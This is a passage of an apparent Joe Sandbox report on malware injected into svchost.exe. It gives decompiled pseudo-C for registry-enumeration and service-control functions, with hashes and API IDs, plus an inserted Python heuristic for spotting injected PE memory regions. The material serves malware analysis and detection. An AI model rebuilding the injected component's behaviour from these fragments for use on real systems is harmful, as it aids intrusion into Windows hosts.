                                                            • Instruction Fuzzy Hash: E7215332315A80A2EB659BA6E65C3AD33A1FB88BD4F044624DF1A47BD6DF39C465C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F41(void* __rax, long long __rbx, long long _a344) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t22;
                                                            				void* _t24;
                                                            				void* _t32;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t22);
                                                            				goto 0xaf546b40;
                                                            				_a344 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t22, _t24, _t32, _t33, _t34);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t22 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}

                                                            Instruction addresses: 0x22baf545f41, 0x22baf545f6d, 0x22baf545f6e, 0x22baf545f73, 0x22baf545f78, 0x22baf545f83, 0x22baf545f88, 0x22baf545f92, 0x22baf545f95, 0x22baf545f9b, 0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ControlManagerQueryStatus
                                                            • String ID:
                                                            • API String ID: 3062456870-0
                                                            • Opcode ID: 877ce3d78f54c526d212d21d359dd48037ddc92e85cf3c8fe00ce85f34946793
                                                            • Instruction ID: 53bc310181e8c11e72a4c0c6a3e9318cceaa9bb3be5c73f31e27d115e7ce9a98
                                                            • Opcode Fuzzy Hash: 877ce3d78f54c526d212d21d359dd48037ddc92e85cf3c8fe00ce85f34946793
                                                            • Instruction Fuzzy Hash: AD11AC32704B00E6EE228BA2A40C3AAB3E1FB89BC1F040124DE8D4375AEF39C400CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F37(void* __rax, long long __rbx, long long _a400) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				void* _t34;
                                                            				void* _t35;
                                                            				void* _t36;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t23);
                                                            				goto 0xaf546b40;
                                                            				_a400 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t23, _t25, _t34, _t35, _t36);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t23 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}

                                                            Instruction addresses: 0x22baf545f37, 0x22baf545f6d, 0x22baf545f6e, 0x22baf545f73, 0x22baf545f78, 0x22baf545f83, 0x22baf545f88, 0x22baf545f92, 0x22baf545f95, 0x22baf545f9b, 0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ManagerQueryStartStatus
                                                            • String ID:
                                                            • API String ID: 2710452061-0
                                                            • Opcode ID: 4807622e4c719f33e40f950f366c8c14e5692b112fb228f5abcd59ef7a6602f5
                                                            • Instruction ID: bc0a6076f7c7396f2021812269c74581e3d574d22d54051d7767c0c8d881af41
                                                            • Opcode Fuzzy Hash: 4807622e4c719f33e40f950f366c8c14e5692b112fb228f5abcd59ef7a6602f5
                                                            • Instruction Fuzzy Hash: 39119632705740A2FF268BA6A95D36AB7D2FB48FC1F444434DE4E4375ADF2AD4458600
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E0000022B22BAF53D9E0(void* __eflags) {
                                                            				void* _t1;
                                                            				void* _t2;
                                                            				void* _t5;
                                                            				void* _t6;
                                                            				void* _t7;
                                                            
                                                            				_t1 = E0000022B22BAF53D900(_t2, __eflags, _t5, _t6, _t7);
                                                            				if (_t1 != 0) goto 0xaf53d9f2;
                                                            				return _t1;
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CreateHeap$AttributesCloseEventFreeHandleMappingObjectProcessSingleViewWait
                                                            • String ID: winssyslog
                                                            • API String ID: 3551488937-1874786851
                                                            • Opcode ID: f79453b3fee362649bcad1cbffb12053d73b19f29dd28a8daf5bc55a0fa96937
                                                            • Instruction ID: 6d567654452b1b48d990b4d7c6bc13eeb656bcd3dbf81d1758421e3ff30e3a71
                                                            • Opcode Fuzzy Hash: f79453b3fee362649bcad1cbffb12053d73b19f29dd28a8daf5bc55a0fa96937
                                                            • Instruction Fuzzy Hash: C131A233214B84A2EB22DFA6E89D3CD73A2F795754F444115DA4943BAACF7AC155CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1183003970
                                                            • Opcode ID: 8b88a278287665879cb75361c8b551d8a1adabaa16cdfb5a2ff20eff31858a0f
                                                            • Instruction ID: ae2a572b789f27726f3cf00544ef8ca086172ccf38a358a0d9e62effb3757def
                                                            • Opcode Fuzzy Hash: 8b88a278287665879cb75361c8b551d8a1adabaa16cdfb5a2ff20eff31858a0f
                                                            • Instruction Fuzzy Hash: 0F21C173204B85A2EB318FA4F4DC3DEB7A0F788394F840125E68943A2ADF79C108CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MonitorWindow$DesktopDisplayEnumFromInfoSettings
                                                            • String ID: h
                                                            • API String ID: 1862586070-2439710439
                                                            • Opcode ID: a5b2284068188970d6261ae4c30728a367663877468abd87794ab0a28de3ead9
                                                            • Instruction ID: 025f710e07214c73ee4a7db031b2e48f49e45b53c5f7bfd2a94e1055a3a76a3d
                                                            • Opcode Fuzzy Hash: a5b2284068188970d6261ae4c30728a367663877468abd87794ab0a28de3ead9
                                                            • Instruction Fuzzy Hash: 9121AF33604B849AD772CF71E44838AB3A1FB88B80F408226DA9D1370ADF39D542CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateWindow$EventHandle
                                                            • String ID: #32770
                                                            • API String ID: 1958951703-463685578
                                                            • Opcode ID: f85c840273bf1d8db3b03ac71be4d2893478c020bccff294b04defcc709c6c95
                                                            • Instruction ID: 9d3bbd50f3417d8bbf3ab3206c6df0d229d37f2621d96cceca981cae58f33811
                                                            • Opcode Fuzzy Hash: f85c840273bf1d8db3b03ac71be4d2893478c020bccff294b04defcc709c6c95
                                                            • Instruction Fuzzy Hash: 99118433205B4192DB258FA4F5587E9B3E4FB98784F144125DE9947F59DF39C094CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 1b02e33b0d9a8706aff6f881ebefdd73711304efd7bfad34e36fe1fdddc9b5a9
                                                            • Instruction ID: f4d76fc0d74ee4e506fd1ee7e0393126bd6df486710eca9f3ecb569cd3d4b2d5
                                                            • Opcode Fuzzy Hash: 1b02e33b0d9a8706aff6f881ebefdd73711304efd7bfad34e36fe1fdddc9b5a9
                                                            • Instruction Fuzzy Hash: C5F0C223225B41A2EFA68BD1F45C3EA3360EB88B90F480419A94B4276ADF3DC484C300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E0000022B22BAF543E20(void* __ecx, void* __edx, long long __rax, long long __rcx, void* __rdx, void* __r8, void* __r9, long long __r12) {
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* __r14;
                                                            				void* _t164;
                                                            				void* _t166;
                                                            				intOrPtr _t177;
                                                            				long long _t185;
                                                            				long long _t189;
                                                            				short* _t190;
                                                            				void* _t197;
                                                            				void* _t208;
                                                            				int _t229;
                                                            				intOrPtr _t230;
                                                            				intOrPtr _t233;
                                                            				void** _t235;
                                                            				void* _t236;
                                                            				signed int _t239;
                                                            				void* _t243;
                                                            				void* _t244;
                                                            				void* _t246;
                                                            				void* _t247;
                                                            				long long _t253;
                                                            				signed int _t257;
                                                            				short* _t263;
                                                            				int _t265;
                                                            				short* _t269;
                                                            				void* _t271;
                                                            				short* _t273;
                                                            
                                                            				_t185 = __rax;
                                                            				 *((long long*)(_t246 + 8)) = __rcx;
                                                            				_t244 = _t246 - 0x27;
                                                            				_t247 = _t246 - 0xc0;
                                                            				_t257 = __rdx + 1;
                                                            				r14d = 0;
                                                            				r9d = __r8 - 1;
                                                            				 *(_t244 - 0x21) = _t257;
                                                            				_t253 = __r9 + _t257;
                                                            				 *(_t244 - 0x19) = r14d;
                                                            				 *((long long*)(_t244 - 0x29)) = _t253;
                                                            				_t236 = __rdx;
                                                            				if (_t253 - _t257 - 4 >= 0) goto 0xaf543e73;
                                                            				 *(_t244 - 0x19) = 1;
                                                            				goto 0xaf543e7e;
                                                            				 *(_t244 - 0x21) = _t257 + 4;
                                                            				E0000022B22BAF543530(_t244 - 0x29);
                                                            				 *((long long*)(_t244 + 0xf)) = _t185;
                                                            				if ( *(_t244 - 0x19) != r14d) goto 0xaf54419b;
                                                            				asm("xorps xmm0, xmm0");
                                                            				 *(_t244 - 0x19) = r14d;
                                                            				asm("movdqu [ebp-0x29], xmm0");
                                                            				E0000022B22BAF53DE20(__edx, _t185, _t197, _t244 - 0x29, _t236, _t236, _t269);
                                                            				 *(_t244 - 0x11) = r14d;
                                                            				r9d = 0x20119;
                                                            				 *(_t247 + 0x20) = _t244 - 9;
                                                            				r8d = 0;
                                                            				 *(_t244 + 0x6f) = r14d;
                                                            				 *(_t244 + 0x7f) = r14d;
                                                            				 *(_t244 - 9) = _t269;
                                                            				if (RegOpenKeyExW(_t271, _t269, _t265, _t229, _t235) != 0) goto 0xaf54414a;
                                                            				 *(_t247 + 0x58) = _t269;
                                                            				r9d = 0;
                                                            				 *(_t247 + 0x50) = _t269;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t247 + 0x48)) = _t244 + 0x7f;
                                                            				 *((long long*)(_t247 + 0x40)) = _t244 + 0x6f;
                                                            				_t189 = _t244 - 0x11;
                                                            				 *((long long*)(_t247 + 0x38)) = _t189;
                                                            				 *(_t247 + 0x30) = _t269;
                                                            				 *(_t247 + 0x28) = _t269;
                                                            				 *(_t247 + 0x20) = _t269;
                                                            				if (RegQueryInfoKeyW(_t243, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf54414a;
                                                            				if ( *(_t244 - 0x11) - 1 < 0) goto 0xaf54414a;
                                                            				 *((long long*)(_t247 + 0xb8)) = __r12;
                                                            				 *((intOrPtr*)(_t244 - 0x31)) =  *(_t244 + 0x6f) + 1;
                                                            				_t190 =  <  ? 0xffffffff : _t189;
                                                            				E0000022B22BAF55A828(2 *  *(_t244 - 9) >> 0x20, _t190);
                                                            				_t273 = _t190;
                                                            				E0000022B22BAF55A828(2 *  *(_t244 - 9) >> 0x20, _t190);
                                                            				 *(_t244 + 7) = _t190;
                                                            				 *((long long*)(_t247 + 0x38)) = _t244 + 0x77;
                                                            				 *((intOrPtr*)(_t244 - 0x31)) =  *(_t244 + 0x6f) + 1;
                                                            				 *(_t244 + 0x77) =  *(_t244 + 0x7f);
                                                            				 *(_t247 + 0x30) = _t190;
                                                            				 *(_t247 + 0x28) = _t244 - 0xd;
                                                            				 *(_t247 + 0x20) = _t269;
                                                            				if (RegEnumValueW(??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf54411e;
                                                            				 *(_t244 - 0x39) =  *(_t244 - 0xd);
                                                            				r8d = 4;
                                                            				 *((intOrPtr*)(_t244 - 1)) = r14d + 1;
                                                            				E0000022B22BAF53DE20(0, _t244 - 0xd, _t197, _t244 - 0x29, _t244 - 0x39, 0xffffffff, _t269);
                                                            				if ( *_t273 != r14w) goto 0xaf543ff1;
                                                            				r8d = 2;
                                                            				E0000022B22BAF53DE20(0, 0, _t197, _t244 - 0x29, _t273, 0xffffffff, _t269);
                                                            				r8d = 4;
                                                            				 *(_t244 - 0x39) =  *(_t244 + 0x77);
                                                            				_t208 = _t244 - 0x29;
                                                            				E0000022B22BAF53DE20(0, 0, _t197, _t208, _t244 - 0x39, 0xffffffff, _t269);
                                                            				_t230 =  *((intOrPtr*)(_t244 - 0x29));
                                                            				 *(_t244 - 0x39) =  *(_t244 + 0x77);
                                                            				if (_t230 != 0) goto 0xaf544041;
                                                            				goto 0xaf544046;
                                                            				r13d = 0 + _t208;
                                                            				if (r13d -  *(_t244 - 0x19) < 0) goto 0xaf5440ad;
                                                            				r13d = r13d + 0x3ff;
                                                            				r13d = r13d & 0xfffffc00;
                                                            				E0000022B22BAF55A828(0, _t208);
                                                            				if (0 == 0) goto 0xaf5440a9;
                                                            				_t177 = _t230;
                                                            				if (_t177 != 0) goto 0xaf544078;
                                                            				goto 0xaf544093;
                                                            				if (_t177 == 0) goto 0xaf54408b;
                                                            				r8d = r14d -  *((intOrPtr*)(_t244 - 0x29));
                                                            				E0000022B22BAF562BA0(r13d, r8d, _t164, _t166, 0, _t230, _t230, 0xffffffff, _t273);
                                                            				E0000022B22BAF55A7E4(0, _t230);
                                                            				 *((long long*)(_t244 - 0x29)) = 0;
                                                            				 *(_t244 - 0x19) = r13d;
                                                            				goto 0xaf5440b1;
                                                            				_t263 =  *(_t244 + 7);
                                                            				_t239 =  *(_t244 - 0x21);
                                                            				r8d =  *(_t244 - 0x39);
                                                            				E0000022B22BAF562BA0(r13d, r8d, r14d -  *((intOrPtr*)(_t244 - 0x29)), _t166, _t239, _t263, 0, _t239, _t273);
                                                            				 *((intOrPtr*)(_t244 - 0x31)) =  *(_t244 + 0x6f) + 1;
                                                            				 *(_t244 + 0x77) =  *(_t244 + 0x7f);
                                                            				 *((long long*)(_t247 + 0x38)) = _t244 + 0x77;
                                                            				 *(_t247 + 0x30) = _t263;
                                                            				 *(_t247 + 0x28) = _t244 - 0xd;
                                                            				 *(_t247 + 0x20) = _t269;
                                                            				 *(_t244 - 0x21) = _t239 + _t197;
                                                            				if (RegEnumValueW(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0xaf543fd0;
                                                            				goto 0xaf544122;
                                                            				if (_t273 == 0) goto 0xaf54412f;
                                                            				E0000022B22BAF55A7E4(_t244 - 0xd, _t273);
                                                            				if (_t263 == 0) goto 0xaf54413c;
                                                            				E0000022B22BAF55A7E4(_t244 - 0xd, _t263);
                                                            				goto 0xaf54414e;
                                                            				_t233 =  *((intOrPtr*)(_t244 - 0x29));
                                                            				if ( *(_t244 - 9) == 0) goto 0xaf54415d;
                                                            				RegCloseKey(_t197);
                                                            				if ( *((intOrPtr*)(_t244 + 0xf)) == 0) goto 0xaf54416a;
                                                            				E0000022B22BAF55A7E4(_t244 - 0xd,  *((intOrPtr*)(_t244 + 0xf)));
                                                            				if (_t233 != 0) goto 0xaf544174;
                                                            				goto 0xaf54417f;
                                                            				r14d =  *(_t244 - 0x21);
                                                            				r14d = r14d -  *((intOrPtr*)(_t244 - 0x29));
                                                            				r9b = 0x3f;
                                                            				r8d = r14d;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)( *((intOrPtr*)(_t244 + 0x67)) + 8)), _t233);
                                                            				if (_t233 == 0) goto 0xaf54419b;
                                                            				return E0000022B22BAF55A7E4(_t244 - 0xd, _t233);
                                                            			}
                                                            0x22baf544112
                                                            0x22baf54411c
                                                            0x22baf544125
                                                            0x22baf54412a
                                                            0x22baf544132
                                                            0x22baf544137
                                                            0x22baf544148
                                                            0x22baf54414a
                                                            0x22baf544155
                                                            0x22baf544157
                                                            0x22baf544160
                                                            0x22baf544165
                                                            0x22baf54416d
                                                            0x22baf544172
                                                            0x22baf544174
                                                            0x22baf54417b
                                                            0x22baf544183
                                                            0x22baf544186
                                                            0x22baf544189
                                                            0x22baf544191
                                                            0x22baf5441ac

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnumValue$CloseInfoOpenQuery
                                                            • String ID:
                                                            • API String ID: 2078201404-0
                                                            • Opcode ID: 83162b61470ba83eb88d29ba9d3dbb23d9ec0a17486f358d6ca758ff64ef6407
                                                            • Instruction ID: 5077d403cad029c9abe2ca623ef2cb08f5a50e62705759f5527bedbf1e7e8256
                                                            • Opcode Fuzzy Hash: 83162b61470ba83eb88d29ba9d3dbb23d9ec0a17486f358d6ca758ff64ef6407
                                                            • Instruction Fuzzy Hash: 29B1AE33B10A40AAEB21DFA1E4896DD77B6F348788F400225EE4A27F9ADF35C515CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
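
The Memory Dump Source line above names the dump this listing was decompiled from: a region in the process the report numbers 7 (the svchost.exe slot, per the snapshot file name), based at 0x22BAF530000, which Joe Sandbox recognised as a PE image. Read together with the signatures at the top of the report (allocates memory in foreign processes, writes to foreign memory regions, system process connects to network), that is an injected executable living inside a Windows service host rather than a module the loader mapped. The Python below is an added example, not code from the report or from Joe Security: it splits the .sdmp identifier into its fields and applies the check a responder would run against a live host or a memory image, flagging executable private memory that carries a PE header inside a system process. The dotted field layout (process index, run, dump id, base, page protection, state, allocation type, reserved) is an assumption inferred from this report's identifiers; the PAGE_* and MEM_* values are the documented Win32 constants, and the real identifier's protection 0x40 (PAGE_EXECUTE_READWRITE) and type 0x20000 (MEM_PRIVATE) are consistent with that reading. The MZ/PE header used as sample region content is constructed.

```python
"""Decode a Joe Sandbox memory-dump identifier and apply an injection heuristic.

Added example; not code from the Joe Sandbox report or from Joe Security.
ASSUMPTION: an .sdmp name is read as
  <process index>.<run>.<dump id>.<base>.<page protection>.<state>.<allocation type>.<reserved>.sdmp
Protection and allocation type are interpreted with the documented Win32
PAGE_* / MEM_* values; <state> and <reserved> are kept raw and not interpreted.
"""
from dataclasses import dataclass
import re

# Documented Win32 page-protection and memory-type constants.
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTABLE_PROTECTIONS = {PAGE_EXECUTE, PAGE_EXECUTE_READ,
                          PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
MEM_PRIVATE = 0x20000    # VirtualAlloc'd memory, not backed by a file
MEM_MAPPED = 0x40000     # section or file mapping
MEM_IMAGE = 0x1000000    # mapped by the image loader (EXE/DLL)

# Hosts that should never carry a PE image in executable private memory.
# Illustrative list, not exhaustive.
SYSTEM_PROCESSES = {"svchost.exe", "explorer.exe", "lsass.exe", "winlogon.exe"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<reserved>[0-9A-Fa-f]{8})\.sdmp$")


@dataclass
class DumpRegion:
    process: int    # sandbox process index (7 is the svchost.exe slot in this report)
    base: int       # region base address
    protect: int    # PAGE_* value
    mem_type: int   # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    data: bytes     # leading bytes of the dumped region


def is_sdmp_name(name: str) -> bool:
    """True if the string matches the assumed .sdmp identifier layout."""
    return SDMP_RE.match(name) is not None


def parse_sdmp_name(name: str, data: bytes = b"") -> DumpRegion:
    """Split an .sdmp file name into a DumpRegion (field layout is an assumption)."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a recognised .sdmp identifier: {name}")
    return DumpRegion(process=int(m["proc"], 16), base=int(m["base"], 16),
                      protect=int(m["protect"], 16), mem_type=int(m["mtype"], 16),
                      data=data)


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    # Bounds-check before dereferencing so a truncated dump cannot raise.
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def injection_indicators(region: DumpRegion, image_name: str) -> list:
    """Return the reasons a region looks like injected code (empty list if none)."""
    reasons = []
    if region.protect == PAGE_EXECUTE_READWRITE:
        reasons.append("PAGE_EXECUTE_READWRITE region")
    if region.protect in EXECUTABLE_PROTECTIONS and region.mem_type == MEM_PRIVATE:
        reasons.append("executable private memory (not loader-mapped)")
    if looks_like_pe(region.data) and region.mem_type != MEM_IMAGE:
        reasons.append("PE header outside a loader-mapped image")
    if reasons and image_name.lower() in SYSTEM_PROCESSES:
        reasons.append(f"host is a system process ({image_name})")
    return reasons


def is_injection_candidate(region: DumpRegion, image_name: str) -> bool:
    return len(injection_indicators(region, image_name)) > 0


# Constructed sample: the dump name quoted in this report, paired with a
# minimal hand-built MZ/PE header standing in for the real dump contents.
REPORT_SDMP = "00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp"
FAKE_PE_HEADER = (b"MZ" + b"\0" * 0x3A            # DOS header up to e_lfanew
                  + (0x40).to_bytes(4, "little")  # e_lfanew -> 0x40
                  + b"PE\0\0" + b"\0" * 20)       # NT signature plus padding


if __name__ == "__main__":
    region = parse_sdmp_name(REPORT_SDMP, FAKE_PE_HEADER)
    print(f"process #{region.process} base=0x{region.base:X} "
          f"protect=0x{region.protect:X} type=0x{region.mem_type:X}")
    for reason in injection_indicators(region, "svchost.exe"):
        print(" -", reason)
```

Run as a script it decodes the report's own dump name and lists four indicators. On a live host the same heuristic applies to the regions VirtualQueryEx returns; the MEM_IMAGE exclusion keeps normally loaded DLLs out of the result, and the e_lfanew bounds check matters because a partially read region would otherwise throw instead of reporting.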

                                                            C-Code - Quality: 38%
                                                            			E0000022B22BAF575FD8(signed int __edx, void* __edi, void* __esi, void* __esp, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                                                            				signed int _v72;
                                                            				char _v80;
                                                            				intOrPtr _v87;
                                                            				char _v88;
                                                            				long long _v96;
                                                            				long long _v104;
                                                            				int _v108;
                                                            				intOrPtr _v112;
                                                            				short _v116;
                                                            				char _v120;
                                                            				signed long long _v128;
                                                            				signed long long _v136;
                                                            				intOrPtr _v144;
                                                            				signed int _v152;
                                                            				void* __rsi;
                                                            				int _t80;
                                                            				signed char _t87;
                                                            				signed long long _t118;
                                                            				intOrPtr* _t127;
                                                            				signed long long _t129;
                                                            				intOrPtr _t138;
                                                            				signed long long _t142;
                                                            				void* _t145;
                                                            				signed long long _t148;
                                                            				void* _t150;
                                                            				void* _t158;
                                                            				void* _t159;
                                                            				signed long long _t163;
                                                            
                                                            				/* 0x22baf575fd8 */ _t129 = __rcx;
                                                            				/* 0x22baf575fd8 */ _a8 = __rbx;
                                                            				/* 0x22baf575ff2 */ _t118 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				/* 0x22baf575ffc */ _v72 = _t118 ^ _t150 - 0x00000080;
                                                            				/* 0x22baf57600d */ r12d = r9d;
                                                            				/* 0x22baf576010 */ _t163 = __edx >> 6;
                                                            				/* 0x22baf576017 */ _t148 = __edx << 6;
                                                            				/* 0x22baf57601e */ _v96 = __r8;
                                                            				/* 0x22baf576022 */ _t127 = __rcx;
                                                            				/* 0x22baf576025 */ _t159 = _t158 + __r8;
                                                            				/* 0x22baf576031 */ _v104 = 0xaf599790;
                                                            				/* 0x22baf57603d */ _v108 = GetConsoleCP();
                                                            				/* 0x22baf576040 */  *__rcx = __rdx;
                                                            				/* 0x22baf576046 */  *((intOrPtr*)(__rcx + 8)) = 0;
                                                            				/* 0x22baf57604c */ if (__r8 - _t159 >= 0) goto 0xaf5761b6;
                                                            				/* 0x22baf576052 */ r13b =  *((intOrPtr*)(__r8));
                                                            				/* 0x22baf57605c */ _v120 = 0;
                                                            				/* 0x22baf576060 */ _t138 =  *((intOrPtr*)(0xaf599790 + _t163 * 8));
                                                            				/* 0x22baf576064 */ _t87 =  *(_t138 + _t148 + 0x3d);
                                                            				/* 0x22baf57606b */ if ((_t87 & 0x00000004) == 0) goto 0xaf57608b;
                                                            				/* 0x22baf576074 */  *(_t138 + _t148 + 0x3d) = _t87 & 0x000000fb;
                                                            				/* 0x22baf576078 */ r8d = 2;
                                                            				/* 0x22baf576082 */ _v88 =  *((intOrPtr*)(_t138 + _t148 + 0x3e));
                                                            				/* 0x22baf576085 */ _v87 = r13b;
                                                            				/* 0x22baf576089 */ goto 0xaf5760d0;
                                                            				/* 0x22baf57608b */ E0000022B22BAF570308(_t87 & 0x000000fb, 0,  *((intOrPtr*)( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x28)), __rcx, __rcx,  &_v88, __r9);
                                                            				/* 0x22baf57609c */ if (( *(0xaf599790 + _t129 * 2) & 0x00008000) == 0) goto 0xaf5760c7;
                                                            				/* 0x22baf5760a1 */ if (__r8 - _t159 >= 0) goto 0xaf576196;
                                                            				/* 0x22baf5760a7 */ r8d = 2;
                                                            				/* 0x22baf5760bc */ if (E0000022B22BAF571FB4(0x8000, __edi, __esp,  *((intOrPtr*)( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x28)), _t127,  &_v120, __r8, _t148, __r8) == 0xffffffff) goto 0xaf5761b6;
                                                            				/* 0x22baf5760c2 */ _t145 = __r8 + 1;
                                                            				/* 0x22baf5760c5 */ goto 0xaf5760e2;
                                                            				/* 0x22baf5760c7 */ r8d = 1;
                                                            				/* 0x22baf5760dc */ if (E0000022B22BAF571FB4(0x8000, __edi, __esp,  *((intOrPtr*)( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x28)), _t127,  &_v120, _t145, _t148, __r8) == 0xffffffff) goto 0xaf5761b6;
                                                            				/* 0x22baf5760e2 */ _v128 = _v128 & 0x00000000;
                                                            				/* 0x22baf5760ec */ _v136 = _v136 & 0x00000000;
                                                            				/* 0x22baf5760f9 */ r9d = 1;
                                                            				/* 0x22baf5760ff */ _v144 = 5;
                                                            				/* 0x22baf576109 */ _v152 =  &_v80;
                                                            				/* 0x22baf576111 */ _t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                                                            				/* 0x22baf576117 */ r14d = _t80;
                                                            				/* 0x22baf57611c */ if (_t80 == 0) goto 0xaf5761b6;
                                                            				/* 0x22baf57612a */ _v152 = _v152 & 0x00000000;
                                                            				/* 0x22baf576130 */ _t142 =  &_v80;
                                                            				/* 0x22baf576134 */ r8d = _t80;
                                                            				/* 0x22baf576141 */ if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xaf5761ae;
                                                            				/* 0x22baf57614b */  *((intOrPtr*)(_t127 + 4)) =  *((intOrPtr*)(_t127 + 8)) - _v96 + __edi;
                                                            				/* 0x22baf576152 */ if (_v112 - r14d < 0) goto 0xaf5761b6;
